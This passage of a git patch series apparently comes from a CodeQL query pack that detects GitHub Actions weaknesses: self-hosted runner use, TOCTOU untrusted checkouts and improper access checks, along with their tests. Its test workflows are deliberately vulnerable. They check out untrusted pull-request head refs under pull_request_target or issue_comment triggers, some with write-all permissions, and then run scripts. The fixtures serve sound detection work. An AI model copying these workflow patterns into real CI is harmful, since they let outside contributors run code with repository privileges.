"pull_request_target" and - // branches and branches-ignore filters - e.hasProperty("branches") and - e.hasProperty("branches-ignore") and - e.getAPropertyValue("branches") = ["main", "master", "default"] and - not e.getAPropertyValue("branches-ignore") = ["main", "master", "default"] -} +string defaultBranchNames() { result = ["main", "master", "default"] } predicate runsOnDefaultBranch(Job j) { exists(Event e | @@ -27,7 +20,7 @@ predicate runsOnDefaultBranch(Job j) { not e.getName() = "pull_request_target" or e.getName() = "push" and - e.getAPropertyValue("branches") = ["main", "master", "default"] + e.getAPropertyValue("branches") = defaultBranchNames() or e.getName() = "pull_request_target" and ( @@ -37,18 +30,18 @@ predicate runsOnDefaultBranch(Job j) { // only branches-ignore filter e.hasProperty("branches-ignore") and not e.hasProperty("branches") and - not e.getAPropertyValue("branches-ignore") = ["main", "master", "default"] + not e.getAPropertyValue("branches-ignore") = defaultBranchNames() or // only branches filter e.hasProperty("branches") and not e.hasProperty("branches-ignore") and - e.getAPropertyValue("branches") = ["main", "master", "default"] + e.getAPropertyValue("branches") = defaultBranchNames() or // branches and branches-ignore filters e.hasProperty("branches") and e.hasProperty("branches-ignore") and - e.getAPropertyValue("branches") = ["main", "master", "default"] and - not e.getAPropertyValue("branches-ignore") = ["main", "master", "default"] + e.getAPropertyValue("branches") = defaultBranchNames() and + not e.getAPropertyValue("branches-ignore") = defaultBranchNames() ) ) ) From 9310150fb027ad6e85bcb266091b4093eb833eba Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 13 May 2024 09:20:45 +0200 Subject: [PATCH 264/707] Resolve conflict --- ql/lib/codeql/actions/ast/internal/Ast.qll | 100 ++++++++++++++---- .../actions/security/SelfHostedQuery.qll | 34 ++++++ .../CodeExecutionOnSelfHostedRunner.ql | 31 +----- .../CWE-284/.github/workflows/test1.yml | 66 ++++++++++++ .../CodeExecutionOnSelfHostedRunner.expected | 6 +- 5 files changed, 186 insertions(+), 51 deletions(-) create mode 100644 ql/lib/codeql/actions/security/SelfHostedQuery.qll diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index e8a92a411423..5e4f078bc3ac 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -544,9 +544,15 @@ class StrategyImpl extends AstNodeImpl, TStrategyNode { override YamlMapping getNode() { result = n } - /** Gets a specific matric expression (YamlMapping) by name. */ - ExpressionImpl getMatrixVarExpr(string name) { - n.lookup("matrix").(YamlMapping).lookup(name) = result.getNode() + YamlMapping getMatrix() { result = n.lookup("matrix") } + + /** Gets a specific matrix expression (YamlMapping) by name. */ + ExpressionImpl getMatrixVarExpr(string accessPath) { + exists(MatrixAccessPathImpl p, ScalarValueImpl v | + p.toString() = accessPath and + resolveMatrixAccessPath(n.lookup("matrix"), p).getNode(_) = v.getNode() and + result.getParentNode() = v + ) } /** Gets a specific matric expression (YamlMapping) by name. */ @@ -777,14 +783,27 @@ class JobImpl extends AstNodeImpl, TJobNode { /** Gets the runs-on field of the job. */ string getARunsOnLabel() { - exists(string lbl, YamlNode r | + exists(ScalarValueImpl lbl | ( - r = runson.getNode(lbl) and - not lbl = ["group", "labels"] + lbl.getNode() = runson.getNode(_) and + not lbl.getNode() = runson.getNode("group") or - r = runson.getNode("labels").(YamlMappingLikeNode).getNode(lbl) + lbl.getNode() = runson.getNode("labels").(YamlMappingLikeNode).getNode(_) ) and - result = lbl.trim().regexpReplaceAll("^('|\")", "").regexpReplaceAll("('|\")$", "").trim() + ( + not exists(MatrixExpressionImpl e | e.getParentNode() = lbl) and + result = + lbl.getValue() + .trim() + .regexpReplaceAll("^('|\")", "") + .regexpReplaceAll("('|\")$", "") + .trim() + or + exists(MatrixExpressionImpl e | + e.getParentNode() = lbl and + result = e.getLiteralValues() + ) + ) ) } } @@ -1050,7 +1069,7 @@ private string jobsCtxRegex() { private string envCtxRegex() { result = Utils::wrapRegexp("env\\.([A-Za-z0-9_-]+)") } -private string matrixCtxRegex() { result = Utils::wrapRegexp("matrix\\.([A-Za-z0-9_-]+)") } +private string matrixCtxRegex() { result = Utils::wrapRegexp("matrix\\.(.+)") } private string inputsCtxRegex() { result = @@ -1224,24 +1243,65 @@ class EnvExpressionImpl extends SimpleReferenceExpressionImpl { * e.g. `${{ matrix.foo }}` */ class MatrixExpressionImpl extends SimpleReferenceExpressionImpl { - string fieldName; + string fieldAccess; MatrixExpressionImpl() { Utils::normalizeExpr(expression).regexpMatch(matrixCtxRegex()) and - fieldName = Utils::normalizeExpr(expression).regexpCapture(matrixCtxRegex(), 1) + fieldAccess = Utils::normalizeExpr(expression).regexpCapture(matrixCtxRegex(), 1) } - override string getFieldName() { result = fieldName } + override string getFieldName() { result = fieldAccess } override AstNodeImpl getTarget() { - exists(WorkflowImpl w | - w.getStrategy().getMatrixVarExpr(fieldName) = result and - w.getAChildNode*() = this - ) - or - exists(JobImpl j | - j.getStrategy().getMatrixVarExpr(fieldName) = result and - j.getAChildNode*() = this + result = this.getEnclosingWorkflow().getStrategy().getMatrixVarExpr(fieldAccess) or + result = this.getEnclosingJob().getStrategy().getMatrixVarExpr(fieldAccess) + } + + string getLiteralValues() { + exists(StrategyImpl s, MatrixAccessPathImpl p, ScalarValueImpl v | + (s = this.getEnclosingJob().getStrategy() or s = this.getEnclosingWorkflow().getStrategy()) and + p.toString() = fieldAccess and + resolveMatrixAccessPath(s.getMatrix(), p).getNode(_) = v.getNode() and + // Exclude values containing matrix expressions to avoid recursion + not exists(MatrixExpressionImpl e | e.getParentNode() = v) and + result = v.getValue() ) } } + +bindingset[accessPath] +string explodeAccessPath(string accessPath) { + result = accessPath or + result = accessPath.suffix(accessPath.indexOf(".") + 1) or + result = accessPath.prefix(accessPath.indexOf(".")) +} + +private newtype TAccessPath = + TMatrixAccessPathNode(string accessPath) { + exists(MatrixExpressionImpl e | accessPath = explodeAccessPath(e.getFieldName())) + } + +class MatrixAccessPathImpl extends TMatrixAccessPathNode { + string accessPath; + + MatrixAccessPathImpl() { this = TMatrixAccessPathNode(accessPath) } + + string toString() { result = accessPath } +} + +private YamlMappingLikeNode resolveMatrixAccessPath( + YamlMappingLikeNode root, MatrixAccessPathImpl accessPath +) { + // access path contains no dots. eg: "os" + result = root.getNode(accessPath.toString()) + or + // access path contains dots. eg: "plaform.os" + exists(MatrixAccessPathImpl first, MatrixAccessPathImpl rest, YamlMappingLikeNode newRoot | + first.toString() = accessPath.toString().splitAt(".", 0) and + rest.toString() = accessPath.toString().suffix(first.toString().length() + 1) and + newRoot = root.getNode(first.toString()) and + if newRoot instanceof YamlSequence + then result = resolveMatrixAccessPath(newRoot.(YamlSequence).getElementNode(_), rest) + else result = resolveMatrixAccessPath(newRoot, rest) + ) +} diff --git a/ql/lib/codeql/actions/security/SelfHostedQuery.qll b/ql/lib/codeql/actions/security/SelfHostedQuery.qll new file mode 100644 index 000000000000..94c6c49a34b0 --- /dev/null +++ b/ql/lib/codeql/actions/security/SelfHostedQuery.qll @@ -0,0 +1,34 @@ +import actions +import codeql.actions.dataflow.ExternalFlow + +string selfHostedRunnerRegexp() { + // source: https://github.com/boostsecurityio/poutine/blob/main/opa/rego/poutine/utils.rego#L49C3-L49C136 + result = + "(?i)^((ubuntu-(([0-9]{2})\\.04|latest)|macos-([0-9]{2}|latest)(-x?large)?|windows-(20[0-9]{2}|latest)|(buildjet|warp)-[a-z0-9-]+))$" +} + +/** + * This predicate uses data available in the workflow file to identify self-hosted runners. + * It does not know if the repository is public or private. + * It is a best-effort approach to identify self-hosted runners. + */ +predicate staticallyIdentifiedSelfHostedRunner(Job job) { + exists(string label | + job.getATriggerEvent() = + ["pull_request", "pull_request_review", "pull_request_review_comment", "pull_request_target"] and + label = job.getARunsOnLabel() and + not label.regexpMatch(selfHostedRunnerRegexp()) + ) +} + +/** + * This predicate uses data available in the job log files to identify self-hosted runners. + * It is a best-effort approach to identify self-hosted runners. + */ +predicate dynamicallyIdentifiedSelfHostedRunner(Job job) { + exists(string runner_info | + workflowDataModel(job.getEnclosingWorkflow().getLocation().getFile().getRelativePath(), + "public", job.getId(), _, _, runner_info) and + runner_info.indexOf("self-hosted:true") > 0 + ) +} diff --git a/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql b/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql index 90997f63631c..621b7fb050db 100644 --- a/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql +++ b/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql @@ -11,36 +11,7 @@ * external/cwe/cwe-284 */ -import actions -import codeql.actions.dataflow.ExternalFlow - -/** - * This predicate uses data available in the workflow file to identify self-hosted runners. - * It does not know if the repository is public or private. - * It is a best-effort approach to identify self-hosted runners. - */ -predicate staticallyIdentifiedSelfHostedRunner(Job job) { - exists(string label | - job.getEnclosingWorkflow().getATriggerEvent().getName() = - ["pull_request", "pull_request_review", "pull_request_review_comment", "pull_request_target"] and - label = job.getARunsOnLabel() and - // source: https://github.com/boostsecurityio/poutine/blob/main/opa/rego/poutine/utils.rego#L49C3-L49C136 - not label - .regexpMatch("(?i)^((ubuntu-(([0-9]{2})\\.04|latest)|macos-([0-9]{2}|latest)(-x?large)?|windows-(20[0-9]{2}|latest)|(buildjet|warp)-[a-z0-9-]+))$") - ) -} - -/** - * This predicate uses data available in the job log files to identify self-hosted runners. - * It is a best-effort approach to identify self-hosted runners. - */ -predicate dynamicallyIdentifiedSelfHostedRunner(Job job) { - exists(string runner_info | - workflowDataModel(job.getEnclosingWorkflow().getLocation().getFile().getRelativePath(), - "public", job.getId(), _, _, runner_info) and - runner_info.matches("self-hosted:true") - ) -} +import codeql.actions.security.SelfHostedQuery from Job job where staticallyIdentifiedSelfHostedRunner(job) or dynamicallyIdentifiedSelfHostedRunner(job) diff --git a/ql/test/query-tests/Security/CWE-284/.github/workflows/test1.yml b/ql/test/query-tests/Security/CWE-284/.github/workflows/test1.yml index 81d614e51223..37eb2bddb58c 100644 --- a/ql/test/query-tests/Security/CWE-284/.github/workflows/test1.yml +++ b/ql/test/query-tests/Security/CWE-284/.github/workflows/test1.yml @@ -26,3 +26,69 @@ jobs: runs-on: self-hosted-azure steps: - run: cmd + test5: + strategy: + fail-fast: false + matrix: + platform: + - name: Linux + os: ubuntu-latest + shell: bash + - name: macOS + os: macos-latest + shell: bash + - name: Windows + os: windows-latest + shell: cmd + node-version: + - 16.14.0 + - 16.x + - 18.0.0 + - 18.x + - 20.x + runs-on: ${{ matrix.platform.os }} + steps: + - run: cmd + test6: + strategy: + matrix: + os: [ubuntu-latest, macos-latest] + runs-on: ${{ matrix.os }} + steps: + - run: cmd + test7: + strategy: + matrix: + os: [self-hosted, ubuntu-latest] + runs-on: ${{ matrix.os }} + steps: + - run: cmd + test8: + strategy: + matrix: + settings: + - host: + - 'self-hosted' + - 'macos' + - 'arm64' + target: 'x86_64-apple-darwin' + runs-on: ${{ matrix.settings.host }} + steps: + - run: cmd + test9: + strategy: + matrix: + os: ${{ github.repository }} + runs-on: ${{ matrix.os }} + steps: + - run: cmd + test10: + strategy: + matrix: + os: ${{ github.repository }} + foo: + - bar: ${{ github.repository }} + baz: "asdf" + runs-on: ${{ matrix.foo.bar }} + steps: + - run: cmd diff --git a/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.expected b/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.expected index 920a818ab351..306bed9baec1 100644 --- a/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.expected +++ b/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.expected @@ -1,4 +1,8 @@ | .github/workflows/test1.yml:8:5:11:2 | Job: test1 | Job runs on self-hosted runner | | .github/workflows/test1.yml:12:5:17:2 | Job: test2 | Job runs on self-hosted runner | | .github/workflows/test1.yml:18:5:25:2 | Job: test3 | Job runs on self-hosted runner | -| .github/workflows/test1.yml:26:5:28:15 | Job: test4 | Job runs on self-hosted runner | +| .github/workflows/test1.yml:26:5:29:2 | Job: test4 | Job runs on self-hosted runner | +| .github/workflows/test1.yml:60:5:66:2 | Job: test7 | Job runs on self-hosted runner | +| .github/workflows/test1.yml:67:5:78:2 | Job: test8 | Job runs on self-hosted runner | +| .github/workflows/test1.yml:79:5:85:2 | Job: test9 | Job runs on self-hosted runner | +| .github/workflows/test1.yml:86:5:94:15 | Job: test10 | Job runs on self-hosted runner | From 9ee9314cb962c8052c41dfded556fe18cf793ee1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 13 May 2024 10:37:42 +0200 Subject: [PATCH 265/707] Resolve conflicts after rebasing --- ql/lib/codeql/actions/security/SelfHostedQuery.qll | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ql/lib/codeql/actions/security/SelfHostedQuery.qll b/ql/lib/codeql/actions/security/SelfHostedQuery.qll index 94c6c49a34b0..898af1a699a9 100644 --- a/ql/lib/codeql/actions/security/SelfHostedQuery.qll +++ b/ql/lib/codeql/actions/security/SelfHostedQuery.qll @@ -14,7 +14,7 @@ string selfHostedRunnerRegexp() { */ predicate staticallyIdentifiedSelfHostedRunner(Job job) { exists(string label | - job.getATriggerEvent() = + job.getATriggerEvent().getName() = ["pull_request", "pull_request_review", "pull_request_review_comment", "pull_request_target"] and label = job.getARunsOnLabel() and not label.regexpMatch(selfHostedRunnerRegexp()) From a1efc78ac7d887e5b18ca8ef3bf40409cbf989ae Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 13 May 2024 13:47:01 +0200 Subject: [PATCH 266/707] Refactor regexps --- .../actions/security/SelfHostedQuery.qll | 23 ++++++++++++++----- 1 file changed, 17 insertions(+), 6 deletions(-) diff --git a/ql/lib/codeql/actions/security/SelfHostedQuery.qll b/ql/lib/codeql/actions/security/SelfHostedQuery.qll index 898af1a699a9..e1279189c275 100644 --- a/ql/lib/codeql/actions/security/SelfHostedQuery.qll +++ b/ql/lib/codeql/actions/security/SelfHostedQuery.qll @@ -1,10 +1,17 @@ import actions import codeql.actions.dataflow.ExternalFlow -string selfHostedRunnerRegexp() { - // source: https://github.com/boostsecurityio/poutine/blob/main/opa/rego/poutine/utils.rego#L49C3-L49C136 - result = - "(?i)^((ubuntu-(([0-9]{2})\\.04|latest)|macos-([0-9]{2}|latest)(-x?large)?|windows-(20[0-9]{2}|latest)|(buildjet|warp)-[a-z0-9-]+))$" +bindingset[runner] +predicate isGithubHostedRunner(string runner) { + // list of github hosted repos: https://github.com/actions/runner-images/blob/main/README.md#available-images + runner + .toLowerCase() + .regexpMatch("^(ubuntu-([0-9.]+|latest)|macos-([0-9]+|latest)(-x?large)?|windows-([0-9.]+|latest)|(buildjet|warp)-[a-z0-9-]+)$") +} + +bindingset[runner] +predicate is3rdPartyHostedRunner(string runner) { + runner.toLowerCase().regexpMatch("^(buildjet|warp)-[a-z0-9-]+$") } /** @@ -15,9 +22,13 @@ string selfHostedRunnerRegexp() { predicate staticallyIdentifiedSelfHostedRunner(Job job) { exists(string label | job.getATriggerEvent().getName() = - ["pull_request", "pull_request_review", "pull_request_review_comment", "pull_request_target"] and + [ + "issue_comment", "pull_request", "pull_request_review", "pull_request_review_comment", + "pull_request_target", "workflow_run" + ] and label = job.getARunsOnLabel() and - not label.regexpMatch(selfHostedRunnerRegexp()) + not isGithubHostedRunner(label) and + not is3rdPartyHostedRunner(label) ) } From cee0389d6eca33f41b51368601c4d06c0d99fd96 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 13 May 2024 15:33:28 +0200 Subject: [PATCH 267/707] Update SelfHostedQuery.qll MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Co-authored-by: Jaroslav LobaÄevski --- ql/lib/codeql/actions/security/SelfHostedQuery.qll | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ql/lib/codeql/actions/security/SelfHostedQuery.qll b/ql/lib/codeql/actions/security/SelfHostedQuery.qll index e1279189c275..3047ba35b064 100644 --- a/ql/lib/codeql/actions/security/SelfHostedQuery.qll +++ b/ql/lib/codeql/actions/security/SelfHostedQuery.qll @@ -6,7 +6,7 @@ predicate isGithubHostedRunner(string runner) { // list of github hosted repos: https://github.com/actions/runner-images/blob/main/README.md#available-images runner .toLowerCase() - .regexpMatch("^(ubuntu-([0-9.]+|latest)|macos-([0-9]+|latest)(-x?large)?|windows-([0-9.]+|latest)|(buildjet|warp)-[a-z0-9-]+)$") + .regexpMatch("^(ubuntu-([0-9.]+|latest)|macos-([0-9]+|latest)(-x?large)?|windows-([0-9.]+|latest))$") } bindingset[runner] From 60769f1671c3b65548eef36f684bf3dc67f3c540 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 13 May 2024 16:26:53 +0200 Subject: [PATCH 268/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index e68a4c67cc4f..acfc1c7e2102 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.22 +version: 0.0.23 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 465be503e7c3..efafbbb55bac 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.22 +version: 0.0.23 groups: - actions - queries From b4096e0201307a16775226f8d37f2aa0d79f9907 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 14 May 2024 09:56:23 +0200 Subject: [PATCH 269/707] Refactor control checks --- .../security/UntrustedCheckoutQuery.qll | 45 +++++++++++++++---- 1 file changed, 37 insertions(+), 8 deletions(-) diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index 10a45830324e..bf60c4a2f7f8 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -221,17 +221,46 @@ class GhSHACheckout extends SHACheckoutStep instanceof Run { } /** An If node that contains an actor, user or label check */ -class ControlCheck extends If { - ControlCheck() { +abstract class ControlCheck extends If { } + +class LabelControlCheck extends ControlCheck { + LabelControlCheck() { + // eg: contains(github.event.pull_request.labels.*.name, 'safe to test') + // eg: github.event.label.name == 'safe to test' + exists( + Utils::normalizeExpr(this.getCondition()) + .regexpFind([ + "\\bgithub\\.event\\.pull_request\\.labels\\b", "\\bgithub\\.event\\.label\\.name\\b" + ], _, _) + ) + } +} + +class ActorControlCheck extends ControlCheck { + ActorControlCheck() { + // eg: contains(github.actor, 'dependabot') + // eg: github.triggering_actor != 'CI Agent' + // eg: github.event.pull_request.user.login == 'mybot' + exists( + Utils::normalizeExpr(this.getCondition()) + .regexpFind([ + "\\bgithub\\.actor\\b", "\\bgithub\\.triggering_actor\\b", + "\\bgithub\\.event\\.comment\\.user\\.login\\b", + "\\bgithub\\.event\\.pull_request\\.user\\.login\\b", + ], _, _) + ) + } +} + +class AssociationControlCheck extends ControlCheck { + AssociationControlCheck() { + // eg: contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) exists( Utils::normalizeExpr(this.getCondition()) .regexpFind([ - "\\bgithub\\.actor\\b", // actor - "\\bgithub\\.triggering_actor\\b", // actor - "\\bgithub\\.event\\.comment\\.user\\.login\\b", //user - "\\bgithub\\.event\\.pull_request\\.user\\.login\\b", //user - "\\bgithub\\.event\\.pull_request\\.labels\\b", // label - "\\bgithub\\.event\\.label\\.name\\b" // label + "\\bgithub\\.event\\.comment\\.author_association\\b", + "\\bgithub\\.event\\.issue\\.author_association\\b", + "\\bgithub\\.event\\.pull_request\\.author_association\\b", ], _, _) ) } From 7c295e011a31d92dff889e9ffefede2b6a940251 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 14 May 2024 10:19:27 +0200 Subject: [PATCH 270/707] TOCTOU queries and tests --- .../UntrustedCheckoutTOCTOUCritical.ql | 25 +++++++++++ .../CWE-367/UntrustedCheckoutTOCTOUHigh.ql | 25 +++++++++++ .../CWE-367/.github/workflows/comment.yml | 41 +++++++++++++++++++ .../CWE-367/.github/workflows/deployment.yml | 31 ++++++++++++++ .../CWE-367/.github/workflows/label.yml | 17 ++++++++ .../UntrustedCheckoutTOCTOUCritical.expected | 2 + .../UntrustedCheckoutTOCTOUCritical.qlref | 1 + .../UntrustedCheckoutTOCTOUHigh.expected | 0 .../CWE-367/UntrustedCheckoutTOCTOUHigh.qlref | 1 + 9 files changed, 143 insertions(+) create mode 100644 ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql create mode 100644 ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql create mode 100644 ql/test/query-tests/Security/CWE-367/.github/workflows/comment.yml create mode 100644 ql/test/query-tests/Security/CWE-367/.github/workflows/deployment.yml create mode 100644 ql/test/query-tests/Security/CWE-367/.github/workflows/label.yml create mode 100644 ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected create mode 100644 ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.qlref create mode 100644 ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.expected create mode 100644 ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.qlref diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql new file mode 100644 index 000000000000..c5e12c0fccc1 --- /dev/null +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql @@ -0,0 +1,25 @@ +/** + * @name Untrusted Checkout TOCTOU + * @description Untrusted Checkout is protected by a security check but the checked-out branch can be changed after the check. + * @kind problem + * @problem.severity error + * @precision high + * @security-severity 9.3 + * @id actions/untrusted-checkout-toctou/critical + * @tags actions + * security + * external/cwe/cwe-367 + */ + +import actions +import codeql.actions.security.UntrustedCheckoutQuery +import codeql.actions.security.PoisonableSteps + +from ControlCheck check, MutableRefCheckoutStep checkout +where + // the mutable checkout step is protected by an access check + check = [checkout.getIf(), checkout.getEnclosingJob().getIf()] and + // the checked-out code may lead to arbitrary code execution + checkout.getAFollowingStep() instanceof PoisonableStep +select checkout, "The checked-out code can be changed after the authorization check o step $@.", + check, check.toString() diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql new file mode 100644 index 000000000000..b74c3389f9d9 --- /dev/null +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql @@ -0,0 +1,25 @@ +/** + * @name Untrusted Checkout TOCTOU + * @description Untrusted Checkout is protected by a security check but the checked-out branch can be changed after the check. + * @kind problem + * @problem.severity warning + * @precision medium + * @security-severity 5.3 + * @id actions/untrusted-checkout-toctou/high + * @tags actions + * security + * external/cwe/cwe-367 + */ + +import actions +import codeql.actions.security.UntrustedCheckoutQuery +import codeql.actions.security.PoisonableSteps + +from ControlCheck check, MutableRefCheckoutStep checkout +where + // the mutable checkout step is protected by an access check + check = [checkout.getIf(), checkout.getEnclosingJob().getIf()] and + // there are no evidences that the checked-out code can lead to arbitrary code execution + not checkout.getAFollowingStep() instanceof PoisonableStep +select checkout, "The checked-out code can be changed after the authorization check o step $@.", + check, check.toString() diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/comment.yml b/ql/test/query-tests/Security/CWE-367/.github/workflows/comment.yml new file mode 100644 index 000000000000..498b46090cbf --- /dev/null +++ b/ql/test/query-tests/Security/CWE-367/.github/workflows/comment.yml @@ -0,0 +1,41 @@ +# https://github.com/AdnaneKhan/ActionsTOCTOU/blob/main/.github/workflows/comment_victim.yml +name: Comment Triggered Test +on: + issue_comment: + types: [created] +permissions: 'write-all' +jobs: + benchmark: + name: Integration Tests + if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} + runs-on: [ubuntu-latest] + steps: + + # test1 + - uses: actions/github-script@v6 + name: Get PR branch + id: issue + with: + script: | + const pr = context.payload.issue.number + const data = await github.rest.pulls.get({ + owner: context.repo.owner, + repo: context.repo.repo, + pull_number: pr + }) + return { + ref: data.data.head.ref, + sha: data.data.head.sha, + } + - uses: actions/checkout@v4 + with: + submodules: recursive + ref: ${{ fromJson(steps.issue.outputs.result).sha }} + - run: bash comment_example/tests.sh + + # test2 + - uses: actions/checkout@v4 + with: + submodules: recursive + ref: "refs/pull/${{ github.event.number }}/merge" + - run: bash comment_example/tests.sh diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/deployment.yml b/ql/test/query-tests/Security/CWE-367/.github/workflows/deployment.yml new file mode 100644 index 000000000000..f0a3035777c5 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-367/.github/workflows/deployment.yml @@ -0,0 +1,31 @@ +# https://github.com/AdnaneKhan/ActionsTOCTOU/blob/main/.github/workflows/deployment_victim.yml +name: Environment PR Check + +on: + pull_request_target: + branches: + - main + paths: + - 'README.md' + workflow_dispatch: +jobs: + test: + environment: Public CI + runs-on: ubuntu-latest + steps: + - name: Checkout from PR branch + uses: actions/checkout@v4 + with: + repository: ${{ github.event.pull_request.head.repo.full_name }} + ref: ${{ github.event.pull_request.head.ref }} + + - name: Set Node.js 20.x for GitHub Action + uses: actions/setup-node@v4 + with: + node-version: 20.x + + - name: installing node_modules + run: cd deployment_example && npm install + + - name: Build GitHub Action + run: cd deployment_example && npm run build diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/label.yml b/ql/test/query-tests/Security/CWE-367/.github/workflows/label.yml new file mode 100644 index 000000000000..1f04440d28bb --- /dev/null +++ b/ql/test/query-tests/Security/CWE-367/.github/workflows/label.yml @@ -0,0 +1,17 @@ +# https://github.com/AdnaneKhan/ActionsTOCTOU/blob/main/.github/workflows/label_victim.yml +name: Label Trigger Test +on: + pull_request_target: + types: [labeled] + branches: [main] + +jobs: + integration-tests: + runs-on: ubuntu-latest + if: contains(github.event.pull_request.labels.*.name, 'safe-to-test') + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.ref }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + - run: bash label_example/tests.sh diff --git a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected new file mode 100644 index 000000000000..e3a42b3265d8 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected @@ -0,0 +1,2 @@ +| .github/workflows/comment.yml:37:9:41:6 | Uses Step | The checked-out code can be changed after the authorization check o step $@. | .github/workflows/comment.yml:10:9:10:188 | ${{ git ... s ') }} | ${{ git ... s ') }} | +| .github/workflows/label.yml:13:9:17:6 | Uses Step | The checked-out code can be changed after the authorization check o step $@. | .github/workflows/label.yml:11:9:11:73 | contain ... -test') | contain ... -test') | diff --git a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.qlref b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.qlref new file mode 100644 index 000000000000..f924f8fe750c --- /dev/null +++ b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.qlref @@ -0,0 +1 @@ +Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql diff --git a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.expected b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.expected new file mode 100644 index 000000000000..e69de29bb2d1 diff --git a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.qlref b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.qlref new file mode 100644 index 000000000000..6284c786b3ae --- /dev/null +++ b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.qlref @@ -0,0 +1 @@ +Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql From 73fbd2311bc0eaded3f7855037c9249d252f6cf5 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 14 May 2024 10:20:04 +0200 Subject: [PATCH 271/707] Improper access check queries and tests --- .../Security/CWE-285/ImproperAccessControl.ql | 30 +++++++++++++++++++ .../CWE-285/.github/workflows/test1.yml | 20 +++++++++++++ .../CWE-285/.github/workflows/test2.yml | 20 +++++++++++++ .../CWE-285/ImproperAccessControl.expected | 1 + .../CWE-285/ImproperAccessControl.qlref | 2 ++ 5 files changed, 73 insertions(+) create mode 100644 ql/src/Security/CWE-285/ImproperAccessControl.ql create mode 100644 ql/test/query-tests/Security/CWE-285/.github/workflows/test1.yml create mode 100644 